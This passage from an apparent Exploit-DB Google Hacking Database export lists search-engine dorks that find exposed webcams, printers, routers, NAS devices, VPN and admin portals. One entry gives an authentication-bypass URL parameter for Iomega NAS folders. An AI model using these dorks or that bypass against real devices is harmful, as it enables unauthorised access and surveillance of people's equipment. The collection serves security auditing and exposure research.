#Date : 18/11/2020
#Exploit Author : Sanu Jose M
Thanks &amp; Regards,
Sanu Jose M
</textualDescription>
<query>inurl:&quot;view.shtml&quot; &quot;Network&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;view.shtml&quot; &quot;Network&quot;</querystring>
<edb></edb>
<date>2020-11-24</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>5787</id>
<link>https://www.exploit-db.com/ghdb/5787</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;view/index.shtml&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;view/index.shtml&quot;
# By using this dork, various camera LIVE AXIS MODEL web interfaces can be
found.
# Date: 14/03/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;view/index.shtml&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;view/index.shtml&quot;</querystring>
<edb></edb>
<date>2020-03-16</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6578</id>
<link>https://www.exploit-db.com/ghdb/6578</link>
<category>Various Online Devices</category>
<shortDescription>inurl:&quot;webArch/mainFrame.cgi&quot; + &quot;Web Image Monitor&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;webArch/mainFrame.cgi&quot; + &quot;Web Image Monitor&quot;
# Web portals for Ricoh printers.
# Date: 26/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;webArch/mainFrame.cgi&quot; + &quot;Web Image Monitor&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;webArch/mainFrame.cgi&quot; + &quot;Web Image Monitor&quot;</querystring>
<edb></edb>
<date>2020-09-28</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4860</id>
<link>https://www.exploit-db.com/ghdb/4860</link>
<category>Various Online Devices</category>
<shortDescription>inurl:'/SSI/Auth/ip_configuration.htm'</shortDescription>
<textualDescription>Dork about internal IP exposures and configuration from HP Printer
inurl:'/SSI/Auth/ip_configuration.htm'
Author : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R
</textualDescription>
<query>inurl:'/SSI/Auth/ip_configuration.htm'</query>
<querystring>https://www.google.com/search?q=inurl:'/SSI/Auth/ip_configuration.htm'</querystring>
<edb></edb>
<date>2018-06-18</date>
<author>Brain Reflow</author>
</entry>
<entry>
<id>3894</id>
<link>https://www.exploit-db.com/ghdb/3894</link>
<category>Various Online Devices</category>
<shortDescription>inurl:*/graphs* intitle:&quot;Traffic and system resource graphing&quot;</shortDescription>
<textualDescription>With this search you can view results for mikrotik graphics interfaces
*Obrigado,*</textualDescription>
<query>inurl:*/graphs* intitle:&quot;Traffic and system resource graphing&quot;</query>
<querystring>https://www.google.com/search?q=inurl:*/graphs* intitle:&quot;Traffic and system resource graphing&quot;</querystring>
<edb></edb>
<date>2013-09-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>6482</id>
<link>https://www.exploit-db.com/ghdb/6482</link>
<category>Various Online Devices</category>
<shortDescription>inurl:.*eservices/login</shortDescription>
<textualDescription>#Dork:inurl:.*eservices/login
#Description: lists eservices logins of govt/org
#Author: Jitendra Kumar Tripathi
Sent with ProtonMail Secure Email.</textualDescription>
<query>inurl:.*eservices/login</query>
<querystring>https://www.google.com/search?q=inurl:.*eservices/login</querystring>
<edb></edb>
<date>2020-08-17</date>
<author>Jitendra Kumar Tripathi</author>
</entry>
<entry>
<id>5893</id>
<link>https://www.exploit-db.com/ghdb/5893</link>
<category>Various Online Devices</category>
<shortDescription>inurl:./sws/index.sws</shortDescription>
<textualDescription>inurl:./sws/index.sws
Category: Sensitive Information
Summary:
A Google dork that gives information about Samsung Printer.
</textualDescription>
<query>inurl:./sws/index.sws</query>
<querystring>https://www.google.com/search?q=inurl:./sws/index.sws</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Prasad Lingamaiah</author>
</entry>
<entry>
<id>3990</id>
<link>https://www.exploit-db.com/ghdb/3990</link>
<category>Various Online Devices</category>
<shortDescription>inurl:.cgi-bin/luci</shortDescription>
<textualDescription>Directory &quot; Powered by LuCI Trunk&quot;.
By Rootkit.</textualDescription>
<query>inurl:.cgi-bin/luci</query>
<querystring>https://www.google.com/search?q=inurl:.cgi-bin/luci</querystring>
<edb></edb>
<date>2015-02-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>3989</id>
<link>https://www.exploit-db.com/ghdb/3989</link>
<category>Various Online Devices</category>
<shortDescription>inurl:.cgi-bin/webproc</shortDescription>
<textualDescription>inurl:.cgi-bin/webproc
Login for various type of router.
By Rootkit.</textualDescription>
<query>inurl:.cgi-bin/webproc</query>
<querystring>https://www.google.com/search?q=inurl:.cgi-bin/webproc</querystring>
<edb></edb>
<date>2015-02-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>6586</id>
<link>https://www.exploit-db.com/ghdb/6586</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/8080 &quot;windows&quot; &quot;live view&quot;</shortDescription>
<textualDescription>#Exploit Title :Webcams, various online devices.
#Google Dork: inurl:/8080 &quot;windows&quot; &quot;live view&quot;
#Date : 30/09/2020
#Exploit Author : Raghotham Mruthike
Warm regards
Raghotham Mruthike
</textualDescription>
<query>inurl:/8080 &quot;windows&quot; &quot;live view&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/8080 &quot;windows&quot; &quot;live view&quot;</querystring>
<edb></edb>
<date>2020-10-01</date>
<author>Raghotham Mruthike</author>
</entry>
<entry>
<id>5920</id>
<link>https://www.exploit-db.com/ghdb/5920</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/?MAIN=DEVICE intitle:TopAccess intext:Device</shortDescription>
<textualDescription>Category: Various Online Devices
Nicholas Doropoulos</textualDescription>
<query>inurl:/?MAIN=DEVICE intitle:TopAccess intext:Device</query>
<querystring>https://www.google.com/search?q=inurl:/?MAIN=DEVICE intitle:TopAccess intext:Device</querystring>
<edb></edb>
<date>2020-04-20</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>4668</id>
<link>https://www.exploit-db.com/ghdb/4668</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/add_vhost.php?lang=</shortDescription>
<textualDescription>inurl:/add_vhost.php?lang=
Nisankh Acharjya
</textualDescription>
<query>inurl:/add_vhost.php?lang=</query>
<querystring>https://www.google.com/search?q=inurl:/add_vhost.php?lang=</querystring>
<edb></edb>
<date>2018-02-09</date>
<author>Nisankh Acharjya</author>
</entry>
<entry>
<id>7355</id>
<link>https://www.exploit-db.com/ghdb/7355</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/admin/public/asdm.jnlp &quot;ASDM on&quot;</shortDescription>
<textualDescription># Google Dork: inurl:/admin/public/asdm.jnlp &quot;ASDM on&quot;
# Various Online Devices
# Date: 31/08/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:/admin/public/asdm.jnlp &quot;ASDM on&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/admin/public/asdm.jnlp &quot;ASDM on&quot;</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4300</id>
<link>https://www.exploit-db.com/ghdb/4300</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/awcuser/cgi-bin/</shortDescription>
<textualDescription>Google Dork for Mitel systems:
inurl:/awcuser/cgi-bin/
@_aliardic_</textualDescription>
<query>inurl:/awcuser/cgi-bin/</query>
<querystring>https://www.google.com/search?q=inurl:/awcuser/cgi-bin/</querystring>
<edb></edb>
<date>2016-06-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>6352</id>
<link>https://www.exploit-db.com/ghdb/6352</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/base/main_login.html intext:&quot;Login&quot;</shortDescription>
<textualDescription>Dorks: inurl:/base/main_login.html intext:&quot;Login&quot;
Category: Sensitive Information
Summary: A Google dork that gives information about the NETGEAR Router.
</textualDescription>
<query>inurl:/base/main_login.html intext:&quot;Login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/base/main_login.html intext:&quot;Login&quot;</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>Prasad Lingamaiah</author>
</entry>
<entry>
<id>5036</id>
<link>https://www.exploit-db.com/ghdb/5036</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/certsrv/certrqus.asp</shortDescription>
<textualDescription>Author: Mattias Borg (Sec-Labs R&amp;D)
</textualDescription>
<query>inurl:/certsrv/certrqus.asp</query>
<querystring>https://www.google.com/search?q=inurl:/certsrv/certrqus.asp</querystring>
<edb></edb>
<date>2018-11-27</date>
<author>Mattias Borg</author>
</entry>
<entry>
<id>5216</id>
<link>https://www.exploit-db.com/ghdb/5216</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/CFIDE/administrator/index.cfm | inurl:/CFIDE/componentutils/login.cfm | inurl:/CFIDE/main/ide.cfm | inurl:/CFIDE/wizards/</shortDescription>
<textualDescription># Google Dork: inurl:/CFIDE/administrator/index.cfm | inurl:/CFIDE/componentutils/login.cfm | inurl:/CFIDE/main/ide.cfm | inurl:/CFIDE/wizards/
# Description: Google Dork to find ColdFusion management interfaces exposed online
# Date: 2019-05-15
# Author: Miguel Santareno
# Contact: https://www.linkedin.com/in/miguelsantareno/
</textualDescription>
<query>inurl:/CFIDE/administrator/index.cfm | inurl:/CFIDE/componentutils/login.cfm | inurl:/CFIDE/main/ide.cfm | inurl:/CFIDE/wizards/</query>
<querystring>https://www.google.com/search?q=inurl:/CFIDE/administrator/index.cfm | inurl:/CFIDE/componentutils/login.cfm | inurl:/CFIDE/main/ide.cfm | inurl:/CFIDE/wizards/</querystring>
<edb></edb>
<date>2019-05-15</date>
<author>Miguel Santareno</author>
</entry>
<entry>
<id>7284</id>
<link>https://www.exploit-db.com/ghdb/7284</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/cgi-bin/login.html &quot;qnap turbo nas&quot;</shortDescription>
<textualDescription>#Google Dork: inurl:/cgi-bin/login.html &quot;qnap turbo nas&quot;
# Various Online Devices
# Date: 17/05/2021
# Exploit Author: Neha Singh
</textualDescription>
<query>inurl:/cgi-bin/login.html &quot;qnap turbo nas&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/cgi-bin/login.html &quot;qnap turbo nas&quot;</querystring>
<edb></edb>
<date>2021-09-23</date>
<author>Neha Singh</author>
</entry>
<entry>
<id>4158</id>
<link>https://www.exploit-db.com/ghdb/4158</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/cgi-bin/luci/freifunk/graph/olsrd/topology/</shortDescription>
<textualDescription>inurl:/cgi-bin/luci/freifunk/graph/olsrd/topology/
Description : This google dork can access many ( LuCI Trunk based wireless system management)
By Sivabalan( CYBER GENIUS ) ...</textualDescription>
<query>inurl:/cgi-bin/luci/freifunk/graph/olsrd/topology/</query>
<querystring>https://www.google.com/search?q=inurl:/cgi-bin/luci/freifunk/graph/olsrd/topology/</querystring>
<edb></edb>
<date>2015-12-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>3759</id>
<link>https://www.exploit-db.com/ghdb/3759</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/cgi-bin/makecgi-pro</shortDescription>
<textualDescription>Brings up listings for Iomgea NAS devices.
Password protected folders are susceptible to authentication bypass by
adding the following to the url (after /cgi-bin/make-cgi-pro):
?page_value=page_files&amp;tab_value=%20&amp;task_value=task_gotoPath&amp;param1_value=(foldername)
Common folders are music, movies, photos &amp; public. Author: Matt Jones</textualDescription>
<query>inurl:/cgi-bin/makecgi-pro</query>
<querystring>https://www.google.com/search?q=inurl:/cgi-bin/makecgi-pro</querystring>
<edb></edb>
<date>2011-12-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>6548</id>
<link>https://www.exploit-db.com/ghdb/6548</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/CgiStart?page</shortDescription>
<textualDescription># Google Dork: inurl:/CgiStart?page
# Various online devices (webcams).
# Date: 18/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:/CgiStart?page</query>
<querystring>https://www.google.com/search?q=inurl:/CgiStart?page</querystring>
<edb></edb>
<date>2020-09-18</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5187</id>
<link>https://www.exploit-db.com/ghdb/5187</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/clusters intitle:&quot;kafka Manager&quot;</shortDescription>
<textualDescription>Manage/Monitor sensitive information in Kafka.
Author : Raj Kiran P
</textualDescription>
<query>inurl:/clusters intitle:&quot;kafka Manager&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/clusters intitle:&quot;kafka Manager&quot;</querystring>
<edb></edb>
<date>2019-04-22</date>
<author>Raj Kiran P</author>
</entry>
<entry>
<id>6487</id>
<link>https://www.exploit-db.com/ghdb/6487</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/config/cam_portal.cgi &quot;Panasonic&quot;</shortDescription>
<textualDescription># Google Dork: inurl:/config/cam_portal.cgi &quot;Panasonic&quot;
# Panasonic Network Camera Management System
# Date: 20/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:/config/cam_portal.cgi &quot;Panasonic&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/config/cam_portal.cgi &quot;Panasonic&quot;</querystring>
<edb></edb>
<date>2020-08-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3830</id>
<link>https://www.exploit-db.com/ghdb/3830</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/control/userimage.html</shortDescription>
<textualDescription>Mobotix webcam search. yet another newer search</textualDescription>
<query>inurl:/control/userimage.html</query>
<querystring>https://www.google.com/search?q=inurl:/control/userimage.html</querystring>
<edb></edb>
<date>2013-02-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>7242</id>
<link>https://www.exploit-db.com/ghdb/7242</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/controlmenu.htm</shortDescription>
<textualDescription># Google Dork: inurl:/controlmenu.htm
# Various Online Devices
# Date: 18/07/2021
# Exploit Author: Marko Žlender
</textualDescription>
<query>inurl:/controlmenu.htm</query>
<querystring>https://www.google.com/search?q=inurl:/controlmenu.htm</querystring>
<edb></edb>
<date>2021-09-16</date>
<author>Marko Žlender</author>
</entry>
<entry>
<id>5883</id>
<link>https://www.exploit-db.com/ghdb/5883</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/dana-cached/sc/</shortDescription>
<textualDescription># Exploit Title: Pulse Secure SSL VPN
# Google Dork: inurl:/dana-cached/sc
# Author: Kitchaphan Singchai (idealphase)
</textualDescription>
<query>inurl:/dana-cached/sc/</query>
<querystring>https://www.google.com/search?q=inurl:/dana-cached/sc/</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>idealphase</author>
</entry>
<entry>
<id>5887</id>
<link>https://www.exploit-db.com/ghdb/5887</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/dana/home/ filetype:cgi</shortDescription>
<textualDescription># Exploit Title: Pulse Secure SSL VPN
# Google Dork: inurl:/dana/home/ filetype:cgi
# Author: Kitchaphan Singchai (idealphase)
</textualDescription>
<query>inurl:/dana/home/ filetype:cgi</query>
<querystring>https://www.google.com/search?q=inurl:/dana/home/ filetype:cgi</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>idealphase</author>
</entry>
<entry>
<id>6022</id>
<link>https://www.exploit-db.com/ghdb/6022</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/db.php?path_local=</shortDescription>
<textualDescription>Dork: inurl:/db.php?path_local=
Description: This Google dork lists out local test db paths for a
web-server.
Author: Abhi Chitkara
</textualDescription>
<query>inurl:/db.php?path_local=</query>
<querystring>https://www.google.com/search?q=inurl:/db.php?path_local=</querystring>
<edb></edb>
<date>2020-05-05</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6905</id>
<link>https://www.exploit-db.com/ghdb/6905</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/DeviceInformation/View &quot;Device Name&quot;</shortDescription>
<textualDescription># Google Dork: inurl:/DeviceInformation/View &quot;Device Name&quot;
# Various Online Devices.
# Date: 28/04/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:/DeviceInformation/View &quot;Device Name&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/DeviceInformation/View &quot;Device Name&quot;</querystring>
<edb></edb>
<date>2021-04-30</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7928</id>
<link>https://www.exploit-db.com/ghdb/7928</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/doc/page/login.asp?</shortDescription>
<textualDescription># Google Dork: inurl:/doc/page/login.asp?
# Various Online Devices
# Date: 18/02/2022
# Exploit Author: Stuart Steenberg
#Description: Used to find Hikvision camera login pages.
</textualDescription>
<query>inurl:/doc/page/login.asp?</query>
<querystring>https://www.google.com/search?q=inurl:/doc/page/login.asp?</querystring>
<edb></edb>
<date>2022-06-17</date>
<author>Stuart Steenberg</author>
</entry>
<entry>
<id>928</id>
<link>https://www.exploit-db.com/ghdb/928</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/en/help.cgi &quot;ID=*&quot;</shortDescription>
<textualDescription>Aficio printers (this search locates the help pages)</textualDescription>
<query>inurl:/en/help.cgi &quot;ID=*&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%2Fen%2Fhelp.cgi+%22ID%3D*%22</querystring>
<edb></edb>
<date>2005-04-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>3611</id>
<link>https://www.exploit-db.com/ghdb/3611</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/exec/show/tech-support/cr</shortDescription>
<textualDescription>Default Cisco 2800 Series page</textualDescription>
<query>inurl:/exec/show/tech-support/cr</query>
<querystring>https://www.google.com/search?q=inurl:/exec/show/tech-support/cr</querystring>
<edb></edb>
<date>2010-11-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>5895</id>
<link>https://www.exploit-db.com/ghdb/5895</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/frameprop.htm</shortDescription>
<textualDescription>inurl:/frameprop.htm
Category: Sensitive Information
Summary:
A Google dork that gives information about Xerox Phaser Printer.
</textualDescription>
<query>inurl:/frameprop.htm</query>
<querystring>https://www.google.com/search?q=inurl:/frameprop.htm</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Prasad Lingamaiah</author>
</entry>
<entry>
<id>6023</id>
<link>https://www.exploit-db.com/ghdb/6023</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/gmap.php?id=</shortDescription>
<textualDescription>Dork: inurl:/gmap.php?id=
Description: This Google dork lists out gmap config details for a drupal
web-server.
Author: Abhi Chitkara
</textualDescription>
<query>inurl:/gmap.php?id=</query>
<querystring>https://www.google.com/search?q=inurl:/gmap.php?id=</querystring>
<edb></edb>
<date>2020-05-05</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>4011</id>
<link>https://www.exploit-db.com/ghdb/4011</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/graphs/ intitle:RouterOs</shortDescription>
<textualDescription>files containing juicy info
Ariel Anonis - @ariel_anonis</textualDescription>
<query>inurl:/graphs/ intitle:RouterOs</query>
<querystring>https://www.google.com/search?q=inurl:/graphs/ intitle:RouterOs</querystring>
<edb></edb>
<date>2015-05-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>6848</id>
<link>https://www.exploit-db.com/ghdb/6848</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/guestimage.html</shortDescription>
<textualDescription># Title: IP Cameras
# Google Dork: inurl:/guestimage.html
# Date: 29/03/2021
# Author: Tobias Marcotto
# Description: Find IP Cameras
</textualDescription>
<query>inurl:/guestimage.html</query>
<querystring>https://www.google.com/search?q=inurl:/guestimage.html</querystring>
<edb></edb>
<date>2021-03-29</date>
<author>Tobias Marcotto</author>
</entry>
<entry>
<id>5849</id>
<link>https://www.exploit-db.com/ghdb/5849</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/HDDReplay.html</shortDescription>
<textualDescription>Category: Various Online Devices
Nicholas Doropoulos
</textualDescription>
<query>inurl:/HDDReplay.html</query>
<querystring>https://www.google.com/search?q=inurl:/HDDReplay.html</querystring>
<edb></edb>
<date>2020-03-30</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>5044</id>
<link>https://www.exploit-db.com/ghdb/5044</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/help/lang/en/help</shortDescription>
<textualDescription>Find MOBOTIX Cameras
Guest View
/cgi-bin/guestimage.html
Multi View
/control/multiview
By TheCrypticSailor</textualDescription>
<query>inurl:/help/lang/en/help</query>
<querystring>https://www.google.com/search?q=inurl:/help/lang/en/help</querystring>
<edb></edb>
<date>2018-12-04</date>
<author>TheCrypticSailor</author>
</entry>
<entry>
<id>6447</id>
<link>https://www.exploit-db.com/ghdb/6447</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/home/homej.html</shortDescription>
<textualDescription># Google Dork: inurl:/home/homej.html
# Various online devices.
# Date: 22/07/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:/home/homej.html</query>
<querystring>https://www.google.com/search?q=inurl:/home/homej.html</querystring>
<edb></edb>
<date>2020-07-26</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6654</id>
<link>https://www.exploit-db.com/ghdb/6654</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/homej.html?</shortDescription>
<textualDescription>#Exploit Title : Various online devices
#Google Dork : inurl:/homej.html?
#Date : 06/11/2020
#Exploit Author : Sanu Jose M
Thanks &amp; Regards,
Sanu Jose M
</textualDescription>
<query>inurl:/homej.html?</query>
<querystring>https://www.google.com/search?q=inurl:/homej.html?</querystring>
<edb></edb>
<date>2020-11-06</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>7072</id>
<link>https://www.exploit-db.com/ghdb/7072</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/hp/device/SignIn/</shortDescription>
<textualDescription># Google Dork: inurl:/hp/device/SignIn/
# Category: Various Online Devices
# Date: 03/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>inurl:/hp/device/SignIn/</query>
<querystring>https://www.google.com/search?q=inurl:/hp/device/SignIn/</querystring>
<edb></edb>
<date>2021-08-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>4159</id>
<link>https://www.exploit-db.com/ghdb/4159</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/hp/device/supply_status.htm</shortDescription>
<textualDescription>inurl:/hp/device/supply_status.htm
Description : This google dork can access many HP LASER JET printers without login
By Sivabalan ( CYBER GENIUS )...</textualDescription>
<query>inurl:/hp/device/supply_status.htm</query>
<querystring>https://www.google.com/search?q=inurl:/hp/device/supply_status.htm</querystring>
<edb></edb>
<date>2015-12-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>1230</id>
<link>https://www.exploit-db.com/ghdb/1230</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/img/vr.htm</shortDescription>
<textualDescription>Linksys wireless G Camera.</textualDescription>
<query>inurl:/img/vr.htm</query>
<querystring>https://www.google.com/search?q=inurl%3A%2Fimg%2Fvr.htm</querystring>
<edb></edb>
<date>2005-12-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>5937</id>
<link>https://www.exploit-db.com/ghdb/5937</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/index.htm intext:&quot;Oki Data Corporation&quot;</shortDescription>
<textualDescription>Category: Various Online Devices
Nicholas Doropoulos</textualDescription>
<query>inurl:/index.htm intext:&quot;Oki Data Corporation&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/index.htm intext:&quot;Oki Data Corporation&quot;</querystring>
<edb></edb>
<date>2020-04-22</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>4160</id>
<link>https://www.exploit-db.com/ghdb/4160</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/index.htm?cat=info&amp;pagesRemaining</shortDescription>
<textualDescription>inurl:/index.htm?cat=info&amp;pagesRemaining
Description: This google dork can access many HP LASER JET PRO printer..
By Sivabalan( CYBER GENIUS ) ...</textualDescription>
<query>inurl:/index.htm?cat=info&amp;pagesRemaining</query>
<querystring>https://www.google.com/search?q=inurl:/index.htm?cat=info&amp;pagesRemaining</querystring>
<edb></edb>
<date>2015-12-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>4161</id>
<link>https://www.exploit-db.com/ghdb/4161</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/index.htm?cat=info&amp;printerInfo</shortDescription>
<textualDescription>inurl:/index.htm?cat=info&amp;printerInfo
Description : This google dork can access many HP LASER JET printers without login..
By Sivabalan ( CYBER GENIUS )</textualDescription>
<query>inurl:/index.htm?cat=info&amp;printerInfo</query>
<querystring>https://www.google.com/search?q=inurl:/index.htm?cat=info&amp;printerInfo</querystring>
<edb></edb>
<date>2015-12-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>6647</id>
<link>https://www.exploit-db.com/ghdb/6647</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/index.html?size=2&amp;mode=4</shortDescription>
<textualDescription>Dorks: inurl:/index.html?size=2&amp;mode=4
Category: Various Online Devices
Summary:
A Google dork that gives the online camera login information.
</textualDescription>
<query>inurl:/index.html?size=2&amp;mode=4</query>
<querystring>https://www.google.com/search?q=inurl:/index.html?size=2&amp;mode=4</querystring>
<edb></edb>
<date>2020-11-04</date>
<author>Prasad Lingamaiah</author>
</entry>
<entry>
<id>6358</id>
<link>https://www.exploit-db.com/ghdb/6358</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/jobq.htm AND intext:&quot;ApeosPort-V&quot;</shortDescription>
<textualDescription>Dorks: inurl:/jobq.htm AND intext:&quot;ApeosPort-V&quot;
Category: Sensitive Information
Summary: A Google dork that gives information about Xerox Printer.
</textualDescription>
<query>inurl:/jobq.htm AND intext:&quot;ApeosPort-V&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/jobq.htm AND intext:&quot;ApeosPort-V&quot;</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>Prasad Lingamaiah</author>
</entry>
<entry>
<id>6753</id>
<link>https://www.exploit-db.com/ghdb/6753</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/Jview &quot;zoom&quot;</shortDescription>
<textualDescription>#Exploit Title : Various Online Devices.
#Google Dork : inurl:/Jview &quot;zoom&quot;
#Summary :A Google dork that gives the online camera information.
#Date : 11/01/2021
#Exploit Author : Sanu Jose M
Thanks &amp; Regards,
Sanu Jose M
</textualDescription>
<query>inurl:/Jview &quot;zoom&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/Jview &quot;zoom&quot;</querystring>
<edb></edb>
<date>2021-01-15</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>6679</id>
<link>https://www.exploit-db.com/ghdb/6679</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/Jview.htm + &quot;View Video - Java Mode&quot;</shortDescription>
<textualDescription># Google Dork: inurl:/Jview.htm + &quot;View Video - Java Mode&quot;
# Various online devices.
# Date: 17/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:/Jview.htm + &quot;View Video - Java Mode&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/Jview.htm + &quot;View Video - Java Mode&quot;</querystring>
<edb></edb>
<date>2020-11-17</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6709</id>
<link>https://www.exploit-db.com/ghdb/6709</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/Jview.htm + intext:&quot;Zoom :&quot;</shortDescription>
<textualDescription>Dorks: inurl:/Jview.htm + intext:&quot;Zoom :&quot;
Category: Various Online Devices
Summary:
A Google dork that gives the online camera information.
</textualDescription>
<query>inurl:/Jview.htm + intext:&quot;Zoom :&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/Jview.htm + intext:&quot;Zoom :&quot;</querystring>
<edb></edb>
<date>2020-12-01</date>
<author>Prasad Lingamaiah</author>
</entry>
<entry>
<id>3612</id>
<link>https://www.exploit-db.com/ghdb/3612</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/level/15/exec/-</shortDescription>
<textualDescription>Default Cisco 2800 Series page</textualDescription>
<query>inurl:/level/15/exec/-</query>
<querystring>https://www.google.com/search?q=inurl:/level/15/exec/-</querystring>
<edb></edb>
<date>2010-11-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>3610</id>
<link>https://www.exploit-db.com/ghdb/3610</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/level/15/exec/-/configure/http</shortDescription>
<textualDescription>Default Cisco 2800 Series page</textualDescription>
<query>inurl:/level/15/exec/-/configure/http</query>
<querystring>https://www.google.com/search?q=inurl:/level/15/exec/-/configure/http</querystring>
<edb></edb>
<date>2010-11-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>5848</id>
<link>https://www.exploit-db.com/ghdb/5848</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/live.htm intext:&quot;M-JPEG&quot;|&quot;System Log&quot;|&quot;Camera-1&quot;|&quot;View Control&quot;</shortDescription>
<textualDescription>Category: Various Online Devices
Nicholas Doropoulos
</textualDescription>
<query>inurl:/live.htm intext:&quot;M-JPEG&quot;|&quot;System Log&quot;|&quot;Camera-1&quot;|&quot;View Control&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/live.htm intext:&quot;M-JPEG&quot;|&quot;System Log&quot;|&quot;Camera-1&quot;|&quot;View Control&quot;</querystring>
<edb></edb>
<date>2020-03-30</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>6927</id>
<link>https://www.exploit-db.com/ghdb/6927</link>
<category>Various Online Devices</category>
